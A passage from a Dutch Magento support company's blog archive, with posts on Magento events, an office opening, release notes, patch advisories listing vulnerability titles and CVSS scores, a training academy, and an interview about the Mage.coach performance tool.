    met Accelerated Mobile Pages(AMP) zullen enige tweaks vereist zijn om deze beter te laten samenwerken met Progressive Web Apps (PWA). Tijdens de presentatie, waarin de samenwerking met Google werd verkondigd, werd al veel gefocust op het gebruik van Magento PWA in een Magento Headless omgeving. Sneller en beter presterende websites met een groter gebruiksgemak voor klanten is het doel waarop gericht wordt met de samenwerking tussen Magento en Google.

    Nieuwe Magento B2B mogelijkheden

    Magento heeft nieuwe functies geintregreerd ,speciaal gericht om de customer experience in de B2B wereld naar een hoger niveau te tillen. Door steeds snellere veranderingen in de B2B wereld is het voor veel bedrijven een uitdaging hun "customer experience" te blijven optimaliseren. De nieuwe functies zorgen voor grote verbeteringen en toevoegingen op het gebied van bedrijfsaccounts, gepersonaliseerde catalogs, prijs lijsten, snelle bestellingen en nog veel meer.

    SupportDesk en Magento Live UK 2017

    SupportDesk heeft het Magento Live UK 2017 event op de voet gevolgd en is op de hoogte van alle ontwikkelingen. Heeft u nog vragen over het Mageno Live UK 2017 event of andere Magento gerelateerde onderwerpen? Neem gerust contact met ons op.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • SupportDesk opent tweede kantoor in Rotterdam

    SupportDesk opent tweede kantoorSupportDesk opent tweede kantoor in Rotterdam

    SupportDesk zet haar jubileumjaar extra luister bij met de opening van een tweede kantoor in Rotterdam. Door een sterke van groei van SupportDesk in de markt en daarmee ook collega’s, werd het huidige pand op de Hogehilweg 19 in Amsterdam te klein. Per 1 juli zal SupportDesk zich dan ook gaan vestigen in de Science Towers in Rotterdam.

    In het nieuwe kantoor zal een team aan support engineers zich vestigen die zich gaan bezighouden met diverse werkzaamheden voor onze klanten. Denk hierbij aan het migreren van webshops van Magento 1 naar Magento 2, het oplossen van diverse Magento Business Intelligence vraagstukken en het verbeteren en monitoren van Magento Performance issues.

    SupportDesk is in 2012 opgericht en vierde op 1 juni haar 5 jarig jubileum. Begonnen met slechts 2 man, is het bedrijf uitgegroeid tot een gevestigde naam op het gebied van Magento 1 & Magento 2 Support met nu twee vestigingen en 25 man in dienst. Met de opening van de tweede locatie zet SupportDesk een belangrijke stap naar groei in de toekomst.

    Het SupportDesk kantoor in Rotterdam is te bereiken op:

    010-3074831

    Science Towers, 8e verdieping

    Marconistraat 16

    3029 AK Rotterdam

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Magento Security Update 2.0.14 & 2.1.7

    security releaseOnlangs zijn er 15 veiligheidslekken in Magento 2.0.x en 2.1.x ontdekt en opgelost in een patch. De lekken zijn aanwezig in alle versies van Magento 2.0.x en 2.1.x, zowel Magento Community als Magento Enterprise shops hebben hiermee te maken. Officieel zijn er enkel patches beschikbaar voor de Magento 2.0 en Magento 2.1 reeks.

    Wat zijn de 15 lekken van Magento 2?

    • APPSEC-1686 - Remote Code Execution in the Admin panel
      • CVSSv3 Severity: 8.8 (High)
    • APPSEC-1626 - RCE in video upload
      • CVSSv3 Severity: 8.8 (High)
    • APPSEC-1746 - Zend Mail vulnerability - continued
      • CVSSv3 Severity: 8.1 (High)
    • APPSEC-1559 - Possible remote code execution in email reminders
      • CVSSv3 Severity: 8.8 (High)
    • APPSEC-1565 - Customer password hash exposed in admin
      • CVSSv3 Severity: 4.3 (Medium)
    • APPSEC-1752 - Stored XSS in admin panel
      • CVSSv3 Severity: 8.0 (High)
    • APPSEC-1699 - API tokens not invalidated after disabling admin user
      • CVSSv3 Severity: 6.8 (High)
    • APPSEC-1632 - Password shown in action log (EE only)
      • CVSSv3 Severity: 6.5 (Medium)
    • APPSEC-1663 - Mass actions do not follow ACL
      • CVSSv3 Severity: 6.5 (Medium)
    • APPSEC-1661 - UI controllers do not follow ACL
      • CVSSv3 Severity: 6.5 (Medium)
    • APPSEC-1679 - APIs vulnerable to CSRF
      • CVSSv3 Severity: 6.1 (Medium)
    • APPSEC-1610 - Custom admin path disclosure
      • CVSSv3 Severity: 5.3 (Medium)
    • APPSEC-1666 - Information leak
      • CVSSv3 Severity: 4.3 (Medium)
    • APPSEC-1659 - Vulnerabilities in JavaScript libraries
      • CVSSv3 Severity: 0.0 (Low)
    • APPSEC-1622 - Incorrect routing of requests
      • CVSSv3 Severity: 0.0 (Low)

    Belangrijk!

    Gebruik Magento 2.0.14 of 2.1.17 CE of EE voor alle nieuwe Community of Enterprise installaties en upgrades om zo de nieuwste verbeteringen, features en beveiligingsupdates te krijgen.

    Wat moet ik doen om Magento Security issues te bestrijden?

    Wij raden onze klanten zo spoedig mogelijk te patchen.

    Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    Via de Magento 2 CLI of Magento 2 setup GUI is het mogelijk de Magento 2 security patch te installeren. Maak altijd eerst een backup van de database en bestanden voor de patch wordt geïmplementeerd.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento Security Update SUPEE-9767

    security releaseOnlangs zijn er 16 veiligheidslekken in Magento ontdekt en opgelost in een patch SUPEE-9767. De lekken zijn aanwezig in alle versies van Magento t/m 1.9/x, dus zowel Magento Community als Magento Enterprise shops hebben hiermee te maken. Officieel zijn er enkel patches beschikbaar vanaf 1.5 en hoger, maar het betreft hier een issue dat impact heeft op alle versies.

    Wat zijn de 16 lekken van SUPEE-9767?

    • APPSEC-1281 - Remote code execution through symlinks
      • CVSSv3 Severity: 8.8 (High)
    • APPSEC-1777 - Remote Code Execution in DataFlow
      • CVSSv3 Severity: 8.8 (High)
    • APPSEC-1686 - Remote Code Execution in the Admin panel
      • CVSSv3 Severity: 8.8 (High)
    • APPSEC-1320 - SQL injection in Visual Merchandiser (Enterprise Edition)
      • CVSSv3 Severity: 8.8 (High)
    • APPSEC-1634 - XSS in data fields
      • CVSSv3 Severity: 8.7 (High)
    • APPSEC-1759 - XSS in Admin panel configuration
      • CVSSv3 Severity: 8.1 (High)
    • APPSEC-1549 - CSRF after logout - form key not invalidated
      • CVSSv3 Severity: 8.0 (High)
    • APPSEC-1693 - Bypassing ACLs in store configuration permissions
      • CVSSv3 Severity: 6.5 (Medium)
    • APPSEC-1677 - Local File Disclosure for admin users with access to dataflow
      • CVSSv3 Severity: 6.5 (Medium)
    • APPSEC-1546 - CSRF Vulnerability in Checkout feature
      • CVSSv3 Severity: 6.1 (Medium)
    • APPSEC-1597 - Potential for user name enumeration
      • CVSSv3 Severity: 5.3 (Medium)
    • APPSEC-1695: CSRF cache management
      • CVSSv3 Severity: 4.7 (Medium)
    • APPSEC-1324 - Customer passwords exposed in logs
      • CVSSv3 Severity: 4.4 (Medium)
    • APPSEC-1675 - Cross-site Request Forgery Vulnerability in Enterprise Edition (EE) Invites
      • CVSSv3 Severity: 3.4 (Medium)
    • APPSEC-1659 - Vulnerabilities in JavaScript libraries
      • CVSSv3 Severity: 0.0 (Low)
    • APPSEC-1622 - Incorrect routing of requests
      • CVSSv3 Severity: 0.0 (Low)

    Belangrijk!

    • Gebruik de CE 1.9.3.3/ EE 1.14.3.3 of nieuwer voor alle nieuwe CE/EE installaties en upgrades om zo de nieuwste verbeteringen, features en beveiligingsupdates te krijgen. Men kan op het moment nog niet naar deze versie updaten via Magento Connect Manager. Dit zal echter wel snel opgelost worden.
    • Magento heeft een tweede versie van de 9767 patch uitgebracht en adviseert dat elke Magento shop de eerste versie terugdraait en de tweede versie installeert. Wij adviseren echter dat als u reeds de eerste versie heeft geïnstalleerd en hier geen problemen mee ondervindt, dat het installeren van versie 2 niet nodig is.

     

    Wat moet ik doen om Magento Security issues te bestrijden?

    Wij raden onze klanten zo spoedig mogelijk te patchen.

    Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    Via de Magento download website is het mogelijk de Magento security patch SUPEE-9652 te installeren. Maak altijd eerst een backup van de database en bestanden voor de patch wordt geïmplementeerd.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento 2 Training Academy


    Magento 2 Training AcademyDe Magento 2 Training Academy is de plek om alles te leren over Magento 2. Iedereen die Magento gebruikt weet het belang van de juiste kennis rondom stabiliteit, functionaliteit en security om je online business te laten excelleren. De Magento 2 omgeving ziet er echter weer compleet anders uit en vergt veel nieuwe “know how”. De Magento Training Academy biedt, aan de hand van meerdere thema’s, de juiste Magento 2 kennis aan voor uw online business.

    Magento 2 training portfolio

    Het portfolio bestaat uit 6 thema’s welke gezamenlijk de belangrijke kernpunten en kennis omvatten voor een optimale Magento 2 website. Alleen geïnteresseerd in meer kennis omtrent Magento 2 Security? Dan kan er dus ook voor een losse module worden gekozen. De thema’s die aangeboden worden zijn (kernachtig) als volgt omschreven:

    Magento 2 Merchant

    Hierin wordt ingegaan op de fundamentele basis rondom het managen van uw Magento 2website. Onderwerpen als het managen van uw producten, categorieën, attributen, CMS pagina’s, marketing en nog veel meer nieuwe handige functionaliteiten van Magento 2 zullen aan bod komen. Kortom ideaal om uw online business te managen.

    Magento 2 Webmaster

    Een iets technischere training die zich focust op het opzetten van een Magento 2 website, alvorens de business manager (Merchant) aan bod komt. Er wordt hier ingegaan op de voorbereiding en het opzetten van Magento 2 alsmede hoe de systeemconfiguraties en server instellingen er uit zullen zien.

    Magento 2 Developer

    Uw Magento 2 website aanpassen aan uw klantwensen? Dan moet is de Magento 2 Developer training ideaal. Hierin leer je hoe men Magento 2 functionaliteiten kan toevoegen en veranderen en hoe de nieuwe architectuur van Magento 2 werkt.

    Magento 2 Theming

    Deze training richt zich meer op de front-end kant van de Magento 2 website. Hierin leer je hoe je het uiterlijk en stijl van je website kan aanpassen en nieuwe thema’s creëert met specifieke functionaliteiten gericht op jouw wensen.

    Magento 2 Security

    een veilige website is een must om alles stabiel en toegankelijk te houden voor klanten. Deze training zorgt ervoor dat je alle kennis vergaart om een solide beveiligde omgeving te creëren voor je Magento 2 website.

    Magento 2 Performance

    Een goed presterende website is essentieel voor je SEO ranking en bezoekerservaring. Deze training focust zich dan ook op alle punten die voor een optimale prestatie zorgen voor een Magento 2 website, een goede SEO architectuur en een optimale ervaring voor bezoekers.

    Het Magento 2 Trainers Team

    Het team bestaat uit drie Magento experts; Ray Bogman (CTO), Vladimir Kerkhoff (Lead Developer) en Erik van Rijn (Lead Developer). Alle zijn ze veelvoudig gecertificeerde Magento experts en echte IT professionals. Daarnaast heeft Ray wereldwijd al meer dan 1000 Magento experts getraind, is hij een gastspreker geweest op meerdere Meet Magento events en heeft vorig jaar een boek gepubliceerd over Magento 2 genaamd; Magento 2 Cookbook.

    Contact

    Wilt u ook uw Magento 2 kennis ook vergroten binnen uw organisatie? Neem dan eens een kijkje op de Magento Training Academy website of stel een vraag aan ze via het contact formulier.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Recap: Meet Magento Nederland 2017 (10 mei)

    Magento doctorOp 10 mei 2017 werd de 9e editie van Meet Magento Nederland georganiseerd in DeFabriqueteUtrecht. Met meer dan 700 bezoekers was dit een van de drukst bezochte edities. En om deze editie een sportieve start te geven begon de dag met de Magerun, een mooi uitgestippelde 5km hardloop route door de binnenstad van Utrecht. Na de Magerun begon het officiële event welke zich op 3 onderdelen focuste:

    • Create great tech
    • Advance your business
    • Discover Magento

    Create great Tech, Advance your Business, Discover Magento, Lightning

    Deze editie besloeg talks en presentaties over Magento in de breedste zin, verspreid over 7 hallen. Create Great Tech had met 2 hallen alles te bieden over de technologische ontwikkelingen, issues en tips en tricks voor Magento 1 en Magento 2, en was dan ook vooral gericht op developers. Ray Bogman (CTO SupportDesk) gaf hier ook een talk en ging in op het opzetten van een OTAP omgeving in Magento 2 genaamd Magento DevBox.

    Advance Your Business had 3 hallen en was gericht op het maximale uit je online business te halen met Magento. Minder technische talks maar meer gericht op Magento E-commerce, brand experience, productmanagement en marketing voor Magento.

    Disvover Magento, hield rekening met de ondernemers die nog niet werken met Magento. In deze hal kon men alles over Magento ontdekken, vragen stellen aan de Magento Doctors en ervaren hoe Magento 2 jouw business kan helpen.

    De Lightning hal was geen apart onderwerp maar omvatte allemaal razend snelle (max 10 min) talks op het gebied van E-commerce en Magento. Hier werd kort verteld over een mobiele shopping app, migratie van Magento 1 naar Magento 2, marketing tools en Magento 2 Enterprise.

    Ondanks de verscheidenheid aan (tracks) onderdelen was te merken dan Magento 2 een onderwerp was dat, in verschillende vormen, overal terugkeerde. De migratie van Magento 1 naar Magento 2, de kosten van het bouwen van een Magento 2 platform en de vraag of Magento 2 nog wel even geschikt is voor alle Magento 1 shops waren onderwerpen die veelvoudig terugkwamen.

    Magento Awards 2017

    Aan het einde van de dag werden de Magento Awards gehouden. Een Panel van Magento experts selecteerde de kandidaten waarin vervolgens de winnaar werd gekozen door de publieksjury. Er zijn 4 websites die een award hebben gewonnen over 4 verschillende categorieën:

    • Best Magento Community webshop – Royal Canin
    • Best Magento Enterprise webshop - Vogel’s
    • Best Magento Innovation – Widgetsystem by Elephant
    • Best Magento Community project – Mage2gen

    Magento community

    Een terugkerend punt op veel Meet Magento events, over de hele wereld, is de aandacht die geschonken wordt aan de Magento community. Met Magento community doelen wij in dit geval op de mensen en bedrijven die constant vrijwillige contributies toevoegen aan het Magento platform. Dit kunnen nieuwe innovatieve tools zijn, Magento customers helpen met vragen op forums, bijdrages leveren op Meet Magento events en nog veel meer. Het doet ons dan ook veel deugd dat ook op dit event hier weer awards voor werden uitgereikt.

    Bij SupportDesk heeft contributies brengen aan het Magento platform altijd centraal gestaan. Op dit event hebben we dan ook geholpen met het organiseren van de Magerun, hebben we 2 talks gegeven (Magento DevBox en Patta), meegeholpen met de kaders ontwikkelen voor de Magento awards en waren we aanwezig in de vorm van Magento Doctorsom allemaal magento vragen te beantwoorden.

    Het event was zeer geslaagd en kijken dan ook zeker uit naar wat het Meet Magento Nederland jubileum volgend jaar voor ons in petto heeft. Het eerst volgende Meet Magento event is Meet Magento Duitsland en zal plaatsvinden op 22&23 meiin Leipzig. SupportDesk zal hier ook aanwezig en we zullen jullie snel een update geven.

    Heeft u vragen over de migratie naar Magento 2, een nieuwe Magento 2 webshop of weten of een Magento 2 shop wel de juiste keuze voor u is? Neem gerust contact met ons op.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Magento User Group: Magento B2B vs. OroCommerce B2B

    Magento B2B vs Orocommerce

    Op 18 mei organiseert SupportDesk weer een interessante Magento User Group. Met de online B2B eCommerce markt die steeds belangrijker wordt en platformen die hier steeds sneller op inspelen, zal deze SupportDesk meetup zich richten rondom het strategisch speerpunt B2B, met name Magento B2B vs OroCommerce B2B

    Welke B2B platform past nou het beste bij uw business case? tijdens deze MUG zal u onder andere antwoord krijgen op deze vraag doordat wij diep in zullen gaan op de verschillen tussen Magento Enterprise 2.2 B2B en OroCommerce B2B. Beide platforms worden onder de loep genomen, functionaliteiten zullen vergeleken worden en handige tips en tricks zullen gegeven worden om zo het perfecte platform te kiezen voor uw business.

    er zal door Ray Bogman (CTO SupportDesk), met diverse voorbeelden, worden ingegaan op de volgende vraagstukken:

    • Hoe heeft de B2B eCommercemarkt zich ontwikkeld en hoe zal deze zich verder ontwikkelen?
    • Wat is Magento Enterprise 2.2 B2B nu eigenlijk?
    • Wat is OroCommerce B2B?
    • Wat is de achtergrond van de systemen?
    • Welke features zijn er nu beschikbaar op beide systemen?
    • Is er ook een Magento Community B2B oplossing?
    • Wat is de roadmap van beide systemen?

    Na de meeetup zal u verbaasd zijn over wat er allemaal mogelijk is met Magento B2B en OroCommerce B2Ben een veel beter inzicht hebben over de mogelijkheden m.b.t uw eigen business. Na de presentatie zal de gelegenheid zijn voor een Q&A met Ray en een aansluitende netwerkborrel om nieuwe mensen te ontmoeten en ideëen te wisselen.

    Om de meetup overzichtelijk en dynamisch te houden zijn het aantal plekken gelimiteerd. Dus wacht niet en schrijf u hier in voor de SupportDesk Magento User Group Magento B2B vs OroCommerce B2B. Tot 18 Mei om 19.00 (Pizza & Bier staan om 18:30 klaar) 

    RSVP hier!

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Meet Magento 2017 "MM17NL"

    mage run Meet Mageto Nederland 2017Op 10 mei wordt Meet Magento the Netherlands weer georganiseerd. De onderhand alweer 9e editie die wordt gehouden is “The place to” be als het gaat over Magento. Ook dit jaar is er weer een bomvolle ochtend-, dag-en avondprogramma met diverse thema’s en sprekers. Dit jaar kunnen we bij de sprekers onder andere bedrijven als Heineken, Philips, Bol.com en natuurlijk SupportDesk verwachten.

    Meet Magento The Netherlands, 10 mei 2017 DeFabrique Utrecht.

    Dit jaar zal het evenement in De Fabrique worden gehouden in Utrecht. Met plaats voor meer dan 1000 bezoekers en verschillende loodsen kan je hier perfect als Magento webwinkelier, marketeer, commerce manager of Magento liefhebber alle talks bijwonen die jou interessant lijken. De opzet van de dag is dan ook slim opgezet met drie verschillende thema’s, verdeeld over in 7 loodsen, die de rode draad van het evenement zijn. De drie thema’s die centraal zijn in deze Meet Magento editie zijn “Create Great Tech”, “Advance Your Business” en “Discover Magento”.

    Alhoewel de talks ook in de ochtend beginnen is het échte ochtendprogramma eigenlijk de Mage Run. Geïnspireerd door andere Magento evenementen over de wereld, zoals Magento Imagine, wil Meet Magento the Netherlands editie ook een gezonde en frisse start aan de dag geven. In deze run, georganiseerd door Ray Bogman, kan je ervoor kiezen om de 3km en 5km run te doen en zo de dag sportief te beginnen. De Mage Run zal om 08:00 van start gaan en al je ook de dag sportief wilt beginnen, Klik dan op Mage Run om je in te schrijven voor de eerste officiële editie.

    Create Great Tech

    Het eerste thema van het Magento evenement. Een thema met veel technische inhoud. Vooral gericht op programmeurs, ontwikkelaars en Magento users die willen weten wat er op technisch vlak allemaal mogelijk is en mogelijk wordt binnen Magento 2. De sprekers zullen hier hun kennis delen over onder andere, Magento 2 CLI, Magento 2 accessibility, Magento 2 Customizations en GrumPHP. Binnen dit thema is SupportDesk ook actief! Ray Bogman (CTO SupportDesk) zal om 12:30 in Loods 2C gastspreker zijn. Hij zal het hebben het nieuwe product van Magento, de DevBox, en zal demonstreren hoe je een DTAP (OTAP) omgeving kan opzetten met het gebruik van Dockers en de officiële DevBox Beta van Magento.

    Advance your Business

    Het tweede thema is gericht op hoe Magento websites en webshops het maximale uit hun business kunnen halen. De Keynote sprekers van o.a Heineken, Philips, JMango 360, Patta zullen aantonen hoe succes kan worden geboekt op onderwerpen als Magento E-commerce, marketing, apps, mobile shopping en multichannel 2 omnichannel.

    Discover Magento

    Het zit al in de naam, dit thema is gericht voor iedereen die overweegt Magento te gebruiken als webwinkel software. In Loods 23 kan iedereen zich laten inspireren en informeren over de mogelijkheden die er zijn bij het gebruik van Magento Software. Er zijn speeddates, talks over de mogelijkheden van Magento en experts waar je vragen aan kan stellen. Meer informatie over de thema's, talks en tijden staan in de agenda.

    Meet Magento Awards

    Het avond programma is even uitgebreid als het dagprogramma met als centraal punt de Meet Magento awards. Ieder jaar worden de prestigieuze Magento awards uitgereikt. 5 prijzen binnen 5 categorieën zijn er te verdelen. De categorieën zijn; Magento Community, Magento Enterprise, Magento 2, Community project, Magento Innovation. Ray was onderdeel van de expert jury en heeft geholpen een voorselectie te maken van alle ingeleverde projecten. Hij heeft ons al laten weten dat er heel veel goede kandidaten tussen zitten. Ook zij vanaf vandaag de stembussen open! dus mocht je benieuwd zijn welke projecten er allemaal genomineerd zijn en wil je stemmen ? Klik dan hier. Verder staat er in het avondprogramma ook nog een uitgrebreid diner in de planning en een afterparty met DJ.

    SupportDesk zal tijdens het hele event aanwezig zijn, inclusief met onze eigen officiële Magento Doctor Ray. De Magento Doctors lopen tijdens het evenement rond om allerlei Magento vragen te beantwoorden. Dus wil je iets weten over Magento 1, Magento 2, Magento webshops en nog veel meer Magento gerelateerde onderwerpen? Neem dan contact met ons op en dan zien wij elkaar tijdens het Meet Magento the Netherlands event.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Magento 2.1.6 is alive!

    magento-upgrade11 april 2017 kwam Magento met een nieuwe update voor de Community Edition en Enterprice Edition, 2.1.6. Deze update bevat belangrijke prestatie verbeteringen, met name voor handelingen die vallen binnen de Category Page en bij image resizing. Magento 2.1.6 bevat 15 aanpassingen die veel features van de 2.1.5 versie significant zullen versnellen:

    Verbeterde prestaties op Caterory Page gebied

    • Het laden van configurabele producten vanuit de database gaat 5x sneller
    • Prijs calculaties gaan nu 3-5% sneller
    • Voorraad validatie gaat tot 20% sneller

    Resizing image is geoptimaliseerd

    • Image resize taken, uitgevoerd vanuit de Command Line Interfaceoperations , genereren nu beelden van alle afmetingen. Bekijk Magento catalog:images:resize voor meer informatie.
    • Image resize taken vanuit de Admin is opgelost.
    • Het aantal file system taken zijn significant verminderd bij het analyseren van images bij de frontend.
    • Caching van image metadata is nu tot 50% sneller, afhankelijk van opslag ruimte (store size).

    Verbeterde prestaties van Layered Navigation

    • Layered navigation is nu tot 3% sneller dankzij het cachen van attribuut opties.
    • Het aantal indexing taken dat uitgevoerd word na een product import is geminimaliseerd.

    Verder heeft de update nog redelijk wat functionele verbeteringen en reparaties meegenomen.

    Catalog

    • Magento vergrendelt niet langer meer de category_product_entity tabel. Door het ontgrendelen van deze tabel wordt de kans op vergrendelings-gerelateerde time-outs, die kunnen voorkomen bij het indexeren en parelle checkouts, verminderd. 
    • De storefront zal nu beelden weergeven die Magento resizes tijdens product save taken, in plaats van de afbeelding te resizen op de storefront. Eerder bevatte het image pad store_id en tijdens opslaan taken veranderde Magento de afbeeldingen voor de default_store_only.De \Magento\CatalogInventory\Model\Stock\Status\getStockId() methode geeft nu de juiste waarden weer.

    Configurabele producten

    • De controle die Magento uitvoert om de bereidheid van de configureerbaar product te bevestigen is nu sneller. Magento berekent niet langer de configurable product special prices op de category pagina. Voorheen berekende Magento de speciale prijzen op de category pagina maar gaf deze niet weer.

    Indexers

    • Magento voert nu een gedeeltelijke re-indexing taak uit na de import wanneer je de "update on Schedule" modus hebt ingeschakeld. Hiervoor werd dit hoe dan ook gedaan, ongeacht in welke index modus men zat.

    Import

    • Magento geeft nu ingevoerde product afbeeldingen in deze volgorde weer: eerst, de basis afbeelding, dan is de extra beelden in de volgorde waarin ze in het CSV-bestand waren opgenomen. Voorheen had Magento geen duidelijk volgorde.

    Diversen

    • Magento cached nu opties voor de Layered Navigatie-functie. Dit verminder het aantal vragen aan de database wat de prestatie verbetert.
    • Magento voert niet langer onnodige file check activiteiten uit (bijvoorbeeld file_exists, is_file), die de prestaties van de categorie en productpagina's verbetert.
    • Magento cached nu metadata, waardoor de tijd om foto's voor metadata te laden wordt vermeden. Dit versnelt ook de prestaties.
    • Magento toont nu een significante afname in Redis Traffic na de upgrade 2.1.2 tot en met 2.1.4.

    Swatches

    • Magento creëert geen overbodige objecten meer bij het initialiseren van een configureerbare product op de categorie pagina.
    • U kunt nu swatches voor zowel de Catalogus pagina en zoekresultaten (snelle of geavanceerde) uitschakelen. Om swatches van deze verzoeken uit te schakelen, schakel uit; Winkels> Configuratie> Catalogus> Storefront> Show swatches in Product List.
    • De logica die Magento gebruikt om swatches attributen te valideren is geoptimaliseerd.
    • Magento slaat nu Swatch data op in blok cache, die de responsiviteit van de configureerbare productpagina's verbetert.

    Zo te lezen heeft deze update veel verbeteringen met zich mee gebracht op het gebied van prestatieverbeteringen bij de Category page en voor Image resizing en heeft het veel praktische verbeteringen geïmplementeerd.

    Wij raden onze klanten zo spoedig mogelijk te updaten.

    Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.
    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento Security Update SUPEE-9652

    security release6 februari 2017 heeft Magento een nieuwe update uitgebracht die de kwetsbaarheid van de Zend library heeft opgelost in de patch SUPEE -9652. De SUPEE-9652 patch heeft een oplossing geboden voor zowel de Enterprise als Community versie. Deze zijn te vinden onder de updates Enterprise Edition 1.1.14.3.2 en Community Edition 1.9.3.2.
    De patch adresseert de volgende problemen:

    Magento EE 1.14.3.2 / CE 1.9.3.2 Release notes:

    • Removal of vulnerability with the Zend framework Zend_Mail library. For more information, see Magento Security Center
    • Updated the copyright year to 2017


    Magento EE 1.14.3.1 / CE 1.9.3.1 Release notes:

    • We restored the old tax calculation algorithm for shipping charges. The patch to apply new calculation will be available on request.
    • Resolved an issue with setting the session lifetime to 0.
    • The monthly cron job that cleans up the table that contains IP addresses and passwords runs properly.
    • All configurable product images are imported.
    • You no longer get an exception due to an undefined addCrumbs() method call.
    • Resolved the error Notice: Undefined index: session_expire_timestamp when accessing the storefront.
    • Values for drop-down label values are saved correctly.
    • The "Price as configured" for bundle products displays correctly in the shopping cart.
    • Auto-generated passwords are sent to new customers as expected.
    • The method Mage_Api_Model_Server_Handler_Abstract::processingMethodResult() accepts scalar and array values.
    • The default MySQL Full-Text search works as expected; it no longer returns all products.
    • Prevented a potential Cross-Site Request Forgery (CSRF) vulnerability by changing the form key when a customer signs out of the storefront.
    • Prevented a potential Cross-Site Scripting (XSS) vulnerability when adding a category. Only for EE edition.
    • Catalog price rules return the correct price.
    • Indexers now update all products instead of skipping the last product updated.

    Belangrijk!
    Gebruik de CE 1.9.3.0/ EE 1.14.3.0 of nieuwer voor alle nieuwe CE/EE installaties en upgrades om zo de nieuwste verbeteringen, features en beveiligingsupdates te krijgen.
    Men kan op het moment nog niet naar deze versie updaten via Magento Connect Manager. Dit zal echter wel snel opgelost worden.

    Wat moet ik doen om Magento Security issues te bestrijden?

    Wij raden onze klanten zo spoedig mogelijk te patchen.

    Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    Via de Magento download website is het mogelijk de Magento security patch SUPEE-9652 te installeren. Maak altijd eerst een backup van de database en bestanden voor de patch wordt geïmplementeerd.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • SupportDesk bij TECH020

    Tech020Op 16 februari 2017 werd het jaarlijkse TECH020 event weer gehouden, en als liefhebber van de nieuwste technologische snufjes was SupportDesk daar natuurlijk bij.
    Meer dan 500 studenten, startups, developers, gamers en IT bedrijven waren aanwezig en natuurlijk heel veel inspirerende sprekers.

    Als troste partner van TECH020 waren wij hier natuurlijk niet alleen om te luisteren en geïnspireerd te raken, maar ook om ons steentje bij te dragen. En niemand die hier beter voor geschikt is dan onze eigen SupportDesk medeoprichter Ray Bogman. Ray is onder andere specialist op het gebied Magento en E-commerce, gebieden waar veel nieuwe ontwikkelingen gaande zijn. Met name de mobiele toegankelijkheid en snelheid voor websites. Ray wist het publiek nieuwe inzichten te geven over High speed mobile en Accelerated mobile pages (AMP) met handige tips en tricks om een website zo mobiel vriendelijk, sneller en toekomst klaar te maken.

    Het was een zeer geslaagd event en we kijken dan ook zeker uit naar het volgende TECH020 event in 2018. Wilt u uw website ook mobiel vriendelijker maken, meer weten E-commerce, Magento of over de SupportDesk tips & tricks van het TECH020 event? Neem dan gerust contact met ons op

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Mage.coach - The online Magento Performance tool

    Mage.coach - The Magento Performance toolToday we sat down with Ray Bogman, inventor of Mage.coach for some more information about this new tool.

    Who is Ray and what is Mage.coach?

    Ray Bogman is the co-founder and technical director of SupportDesk.nu and regular spokesperson at many Magento events around the world. Mage.coach is a tool that analyses the performance, accessibility, usability of Magento websites.

    How did you come up with the idea?

    For about 8 years I am interested in all theory about website performances, and how to enhance them.
    I came up with the idea of Mage.coach after stumbling on a problem for several years and decided to do something about it. When I used to analyze the performances of websites I couldn't find tools that fitted my needs. When I discovered Sitespeed.io I got inspired on what was possible with open source tools and began designing my own analyzing tool. The concept was to design a product that makes website analyses generic and easy. So Mage.coach is a tool in which you can simply analyze the performance of Magento websites.

    A little bit more specific about Mage.coach

    We build Mage.Coach around the open source software of Sitespeed.io and started tweaking, changing and adding some extra functionalities. The concept is to make analyses easy, so imagine if you want to check how good your website performs, you only have to take 4 small steps.

    • Go to Mage.coach
    • Fill in the URL of the website you want to analyze
    • Fill in info (browser type, device type, and connection type)
    • Click start and our tool will send you a report.

    The report will give you an insight in your;

    • Overal performance of the website
    • Usability of the website
    • Accessibility of the website
    • insight on how to enhance the SEO of the website

    Can you only use Mage.Coach for Magento websites?

